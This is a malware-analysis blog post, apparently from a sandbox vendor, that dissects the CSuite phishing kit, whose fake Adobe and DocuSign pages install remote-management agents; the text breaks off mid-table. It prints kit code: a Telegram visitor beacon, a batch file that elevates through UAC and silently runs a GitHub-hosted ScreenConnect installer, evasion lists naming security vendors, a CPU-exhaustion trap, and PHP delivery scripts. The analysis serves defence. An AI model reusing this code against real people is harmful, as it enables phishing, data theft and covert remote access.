padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Breakdown of the CSuite Attack </h2>



<p class="wp-block-paragraph">Here is a thorough breakdown of the CSuite attack: </p>



<h3 class="wp-block-heading">The Lure Page: a Counterfeit Adobe reader that Reports to Telegram </h3>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/08790f88-7a5e-4dae-a528-92589234a8f1?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check sandbox session</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="579" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-1024x579.png" alt="The lure mail CSuite" class="wp-image-23233" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-1024x579.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-1536x868.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-2048x1157.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-mail-740x418.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The lure mail. A compliance deadline, a short list of things the recipient must do, and one button</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Every host in the pivot corpus serves the same page. It renders a counterfeit PDF viewer, the title <strong>PDF Viewer</strong>, the Adobe Clean typeface, a drawn browser window with an Adobe tab, over a document that sits just out of reach behind a modal. The document is whatever theme the campaign is running that week: a blank business contract in the recovered samples, a licensing agreement in the live run below. The only working control is the button, and the button downloads. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-1024x578.jpg" alt="Counterfeit PDF viewer with the update prompt" class="wp-image-23286" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Counterfeit-PDF-viewer.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Counterfeit PDF viewer with the update prompt</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">On load the page queries a geolocation service, assembles a visitor record, and posts it to the Telegram bot API. The code reaches the victim unminified, still carrying the setup instructions the kit shipped with: </p>



<pre class="wp-block-code"><code>const TELEGRAM_BOT_TOKEN = '8996595988:******'; 
const TELEGRAM_CHANNEL_ID = '20****165'; 
     
// Telegram Notification Functions 
async function getVisitorInfo() { 
  try { 
    // Get visitor's IP and location info 
    const response = await fetch('https://ipapi.co/json/'); 
    const data = await response.json(); 
// ... </code></pre>



<p class="wp-block-paragraph">The record is formatted as a chat message and delivered with one POST: address, country, city, region, time zone and carrier; coordinated and local time; platform, language, screen and window dimensions; and the full user-agent string. </p>



<pre class="wp-block-code"><code>async function sendTelegramNotification(visitorInfo) { 
      try { 
        const message = `?? New Visitor Alert - MSI Page 
         
?? Location Details: 
• IP Address: ${visitorInfo.ip} 
• Country: ${visitorInfo.country} 
• City: ${visitorInfo.city} 
• Region: ${visitorInfo.region} 
• Timezone: ${visitorInfo.timezone} 
• ISP: ${visitorInfo.isp} 
 
? Time Information: 
• UTC Time: ${visitorInfo.timestamp} 
• Local Time: ${visitorInfo.localTime} 
 
?? Device Details: 
• Platform: ${visitorInfo.platform} 
• Language: ${visitorInfo.language} 
• Screen: ${visitorInfo.screenResolution} 
• Window: ${visitorInfo.windowSize} 
 
?? Browser Info: 
• User Agent: ${visitorInfo.userAgent} 
 
--- 
Adobe Acrobat MSI Download Page Visit`; 
 
// ...  
const telegramUrl = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`; 
const response = await fetch(telegramUrl, { 
  method: 'POST', 
  headers: { 
    'Content-Type': 'application/json', 
  }, 
  body: JSON.stringify({ 
    chat_id: TELEGRAM_CHANNEL_ID, 
    text: message, 
    parse_mode: 'HTML' 
  }) 
}); 
// ... </code></pre>



<p class="wp-block-paragraph">Clicking the “View Update” button opens a drawn browser window inside the page, styled as get.adobe.com and titled “Download and launch to view NMLS 2026 Updated Agreement”, with two numbered steps. Step one downloads; step two tells the victim to open the file from the Downloads folder. The browser’s own download panel is where the pretence breaks: the delivered file is <strong>NMLS 2026 Updated Agreement.bat.</strong> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-1024x578.jpeg" alt="The counterfeit Adobe download page drawn inside the lure, and the batch file it hands over" class="wp-image-23235" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-1024x578.jpeg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-300x169.jpeg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-768x434.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-370x209.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-270x152.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2-740x418.jpeg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-2.jpeg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The counterfeit Adobe download page drawn inside the lure, and the batch file it hands over</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">That batch file is 324 bytes long, and it does one thing: </p>



<pre class="wp-block-code"><code>@echo off 
REM Check if already admin 
fltmc &gt;nul 2&gt;&amp;1 
set CODE=%errorLevel% 
if %CODE% == 0 ( 
    msiexec /i "https://github.com/Ivan3900/test/raw/main/ScreenConnect.ClientSetup.msi" /quiet /norestart 
) else ( 
    REM Re-run the script as admin 
    powershell -Command "Start-Process '%~f0' -Verb RunAs" 
    exit 
) </code></pre>



<p class="wp-block-paragraph">fltmc answers whether the script already holds administrative rights; when it does not, PowerShell relaunches the script through the UAC prompt the victim has been primed to accept.  </p>



<h3 class="wp-block-heading">Anti-Analysis Scaffold </h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-390"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="9"
           data-wpID="390"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Mechanism                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Implementation                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Shared blacklist                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        blacklistSystem.checkBlacklist() onDOMContentLoaded, loaded from the m/ directory                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Decoy page                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        A false maintenance notice whose button callsactivateTrap() in the shared gate                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Environment checks                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        detectAutomation, validateBrowserEnvironment andgenerateSecureToken, each routing a failure to the decoy page                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Honeypot fields                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Hidden inputs honeypot1 and honeypot2 positioned off-screen; filling either one triggers a block                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Platform filter                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Mobile, touch-enabled desktop and non-Windows visitors are diverted, since the payload is Windows-only                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Debugger obstruction                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Context menu, F12, developer-tool and view-source shortcuts suppressed; the console is cleared once a second                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Index suppression                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        noindex, nofollow, noarchive, nosnippet, no-store caching and Referrer-Policy: no-referrer                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Warning bypass                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Edge visitors get a dialogue coaching them to press Keep on the download warning                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-390'>
table#wpdtSimpleTable-390{ table-layout: fixed !important; }
table#wpdtSimpleTable-390 td, table.wpdtSimpleTable390 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">The flow is designed to do two things in one visit: install a remote-management client, then redirect the victim to a credential-capture page through window.utils.getObfuscatedUrl(), carrying the victim’s address from the URL fragment. </p>



<p class="wp-block-paragraph">In both deployments, the m/ directory is missing, leaving window.utils, blacklistSystem, and botTrapSystem undefined. Because each call is protected by a typeof check, the page continues to function:cloaking and redirection fail, but the beacon and payload delivery still work. Telemetry supports this, with 13 consecutive alerts from page A including unfiltered data-centre addresses. </p>



<h3 class="wp-block-heading">The Gate at The Pivot Path </h3>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="553" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-1024x553.png" alt="The JavaScript utils.js file import inside PDF Viewer" class="wp-image-23237" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-1024x553.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-768x415.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-1536x829.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-370x200.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-740x400.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source.png 1987w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The JavaScript utils.js file import inside PDF Viewer</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>m/js/utils.js</strong> is the file every page in the corpus asks for, and a copy of it sits at that exact path in another sandbox run of the kit. It is 66 KB of unminified, commented JavaScript under the headerEnhanced CAPTCHA Protection Utilities.  </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Increase SOC capacity without adding headcount.
</span> 
<br>
Handle more investigations with less manual work.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Incident Response</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">The code decides whether a visitor is worth a phishing page. It checks: </p>



<ul class="wp-block-list">
<li>The user-agent against forty crawler and automation signatures — search-engine and link-preview bots, curl, wget, python-requests, and the automation stack: headless, selenium, webdriver,puppeteer, phantom, jsdom. </li>



<li>The user-agent against thirty-two security-vendor and scanner names — endpoint vendors, mail gateways such as mimecast, proofpoint, barracuda and cofense, and reputation services such asvirustotal, urlscan, netcraft, sucuri and zscaler. </li>



<li>The visitor’s address against twenty hard-coded addresses and two /24 ranges, with a helper that adds new ones at runtime. </li>



<li>The address itself twice over, through a STUN request to Google’s server and through a public lookup service, so a browser behind a proxy still gives up a local candidate. </li>



<li>The country behind that address against a six-entry block list, resolved through a public geolocation API. </li>



<li>The browser fingerprint against a ban list held in localStorage — three failed checks and that fingerprint is refused for 24 hours. </li>



<li>Whether the environment behaves like a browser at all: storage, canvas, WebGL and font access, plugin state, time-zone consistency, and platform against user-agent. </li>



<li>Whether a human is present: mouse-velocity variance, keystrokes, touch events, interaction count and time on page. </li>



<li>A reCAPTCHA v3 score against a threshold that comes from server-side configuration. </li>
</ul>



<p class="wp-block-paragraph">Two name lists do most of that work: </p>



<pre class="wp-block-code"><code>knownBotSignatures: &#091; 
    "googlebot", "bingbot", "yandexbot", "slurp", "duckduckbot", "baiduspider", 
    ... 
    "scanner", "crawler", "spider", "headless", "scraper", "selenium", "webdriver", 
    "puppeteer", "phantom", "nightmare", "jsdom" 
], 
 
// Known security tools and email security scanners - REDUCED LIST 
securityTools: &#091; 
    "avast", "avg", "avira", "bitdefender", "kaspersky", "mcafee", "norton", 
    "eset", "f-secure", "trend micro", "sophos", "symantec", "trustwave", "forcepoint", 
    "checkpoint", "barracuda", "mimecast", "proofpoint", "fireeye", "crowdstrike", 
    "cyren", "spamhaus", "spamcop", "netcraft", "virustotal", "sucuri", "urlscan", 
    "zscaler", "office365", "microsoft-security", "cisco", "forcepoint", "cofense" 
] </code></pre>



<p class="wp-block-paragraph">Read the second list as the set of checks the operator expects a lure to have to survive; forcepoint appears in it twice, which says something about how it was assembled. Country filtering is five lines, and the comment reads like a template default nobody revisited: </p>



<pre class="wp-block-code"><code>const geoBlockSystem = { 
    blockedCountries: &#091;"RU", "CN", "KP", "IR", "SY", "CU"], // Example: block Russia, China, North Korea, Iran, Syria, Cuba 
    ... 
    if (this.blockedCountries.includes(this.visitorCountry)) { 
        this.blockAction(); 
    } </code></pre>



<p class="wp-block-paragraph">A visitor who fails any check gets one of three fake maintenance pages, “We’re making some improvements”, a 503 with a generated error reference, a database-migration notice, and every button on them is wired to a trap: </p>



<pre class="wp-block-code"><code>// Create an infinite loop that consumes CPU and memory 
function activateTrap() { 
    showLoadingMessage(); 
    ... 
    for (let i = 0; i &lt; 10000; i++) { 
        memoryConsumer.push(Array(1000).fill(Math.random().toString(36))); 
    } 
    let result = 0; 
    for (let i = 0; i &lt; 10000000; i++) { 
        result += Math.sqrt(i) * Math.cos(i) / (1 + Math.sin(i)); 
    } 
    setTimeout(infiniteLoop, 10); 
} </code></pre>



<p class="wp-block-paragraph">The trap also arms itself on a timer, 30 to 120 seconds after load, “to catch bots that don’t interact but wait on the page” — a direct shot at automated analysis that opens a URL and idles. </p>



<h3 class="wp-block-heading">The PHP Build of the Same Kit </h3>



<p class="wp-block-paragraph">With the following TI Lookup query, we can search through recent public sandbox analyses and identify this malicious activity. </p>



<p class="wp-block-paragraph">TI Lookup: <a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/e-sign_files/Icon-pdf-file-svg.png$%5C%22%20OR%20url:%5C%22eDocusign.php$%5C%22%20OR%20url:%5C%22/e-sign.php$%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;/e-sign_files/Icon-pdf-file-svg.png$&#8221; OR url:&#8221;eDocusign.php$&#8221; OR url:&#8221;/e-sign.php$&#8221;</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="613" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-1024x613.png" alt="TI Lookup with .php URLs" class="wp-image-23238" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-1024x613.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-300x180.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-768x460.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-1536x919.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-370x221.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-270x162.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-740x443.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2.png 1749w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup with .php URLs</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This build is public in a sandbox run of its own: <a href="https://app.any.run/tasks/01709d4e-aa5d-4be3-b374-c21ced022181?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s analysis session</a> of 27 August 2026, and the earliest public submission of the same build dates to 2 April 2026. It opens with a forged DocuSign envelope. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="579" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-1024x579.png" alt="The lure mail: a forged DocuSign envelope in the name of a law firm, with one call to action." class="wp-image-23239" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-1024x579.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-1536x868.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-2048x1157.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-mail-740x418.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The lure email: a forged DocuSign envelope in the name of a law firm, with one call to action</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The Adobe pages are a static export. The DocuSign line runs the original server-side build, where five files carry the whole flow: index.php, eDocusign.php, e-sign.php, download.php andsettings.php. The header comment names its author and a contact handle, DocuSign BY &lt;NICKNAME&gt; tg-@&#8230;, and the alert footer repeats the same signature seen in the DocuSign templates in open telemetry, which is what marks the build as one author’s work. </p>



<p class="wp-block-paragraph">index.php is the entry point. It reads the visitor from the request, resolves geolocation server-side, reports, and moves the visitor on: </p>



<pre class="wp-block-code"><code>$ip      = $_SERVER&#091;'REMOTE_ADDR'] ?? 'UNKNOWN'; 
$agent   = $_SERVER&#091;'HTTP_USER_AGENT'] ?? 'UNKNOWN'; 
$referer = $_SERVER&#091;'HTTP_REFERER'] ?? 'Direct / None'; 
$geo = @json_decode(file_get_contents("http://ip-api.com/json/$ip"), true); 
$message = "&#x1f514;&lt;b&gt; DocuSign Visit Alert &lt;/b&gt;&#x1f514;\n\n" . "&#x1f552; Time: $time\n" . "&#x1f9ec; IP: $ip\n" . ...; 
sendTelegramMessage($message); 
header("Location: eDocusign.php"); </code></pre>



<p class="wp-block-paragraph"><strong>eDocusign.php</strong> is the decoy. A business-proposal letter is rendered and then blurred with filter: blur(6px), with a PDF icon and a spinner floating above it, so the visitor sees a document that appears to be loading. Copy, save, print, select-all, view-source and drag are disabled, and after five seconds the page moves on by itself: </p>



<pre class="wp-block-code"><code>&lt;div class="protected"&gt;   &lt;!-- the whole letter, rendered then blurred --&gt; 
&lt;div class="pdf-overlay"&gt;&lt;img src="e-sign_files/Icon-pdf-file-svg.png" class="pdf-icon"&gt;&lt;div class="spinner"&gt;&lt;/div&gt;&lt;/div&gt; 
... 
setTimeout(function () { window.location.href = "e-sign.php"; }, 5000); </code></pre>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-1024x578.jpeg" alt="The decoy proposal, rendered and blurred " class="wp-image-23240" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-1024x578.jpeg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-300x169.jpeg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-768x434.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-370x209.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-270x152.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign-740x418.jpeg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-eDocusign.jpeg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The decoy proposal, rendered and blurred </em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>e-sign.php</strong> carries DocuSign branding, an inline vector logo and a single instruction, “Open the downloaded attachment on your computer”, behind a button that calls download.php. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-1024x578.jpeg" alt="The DocuSign-branded download page " class="wp-image-23241" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-1024x578.jpeg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-300x169.jpeg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-768x434.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-370x209.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-270x152.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish-740x418.jpeg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/php-phish.jpeg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The DocuSign-branded download page </em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>download.php </strong>handles delivery and the second report. It picks between a local file and a remote link on one flag, resolves the client address through Cloudflare headers before falling back to the socket address, classifies device and browser from the user agent, sends a “DocuSign Download Alert”, then flushes the output buffers and streams the installer with attachment headers: </p>



<pre class="wp-block-code"><code>$USE_LOCAL_DOWNLOAD = true; // true = file download, false = link download 
$localFile = $USE_LOCAL_DOWNLOAD ? __DIR__ . '/files/DocusignEditSetup.msi' : ''; 
$ip = $_SERVER&#091;'HTTP_CF_CONNECTING_IP'] 
    ?? $_SERVER&#091;'HTTP_X_FORWARDED_FOR'] 
    ?? $_SERVER&#091;'REMOTE_ADDR'] 
    ?? 'Unknown'; </code></pre>



<p class="wp-block-paragraph"><strong>settings.php </strong>holds the reporting credentials and the send routine, and it guards itself against being fetched directly: </p>



<pre class="wp-block-code"><code>if (basename(__FILE__) == basename($_SERVER&#091;"SCRIPT_FILENAME"])) { 
    http_response_code(403); 
    exit("Access denied."); 
} </code></pre>



<h3 class="wp-block-heading">Installing the Agent: Four Methods, One Outcome </h3>



<p class="wp-block-paragraph">Every chain in this cluster ends the same way: a legitimate remote-management or device-management agent installed on the machine and registered to a tenant the operator holds. The tag row on the pivot query reads as a product catalogue on its own: screenconnect, connectwise, datto, action1, logmeinrescue, fleetdeck, simplehelp and ultravnc. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-389"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="5"
           data-wpID="389"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Method                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Example                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        What the victim does                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Installer inside an archive                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        AdobePdf_Reader.zip, 9.8 MB, holdingScreenConnect.ClientSetup.msi, 10.2 MB                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Extracts the archive and runs the installer, following the instructions on the page                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Installer served directly                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
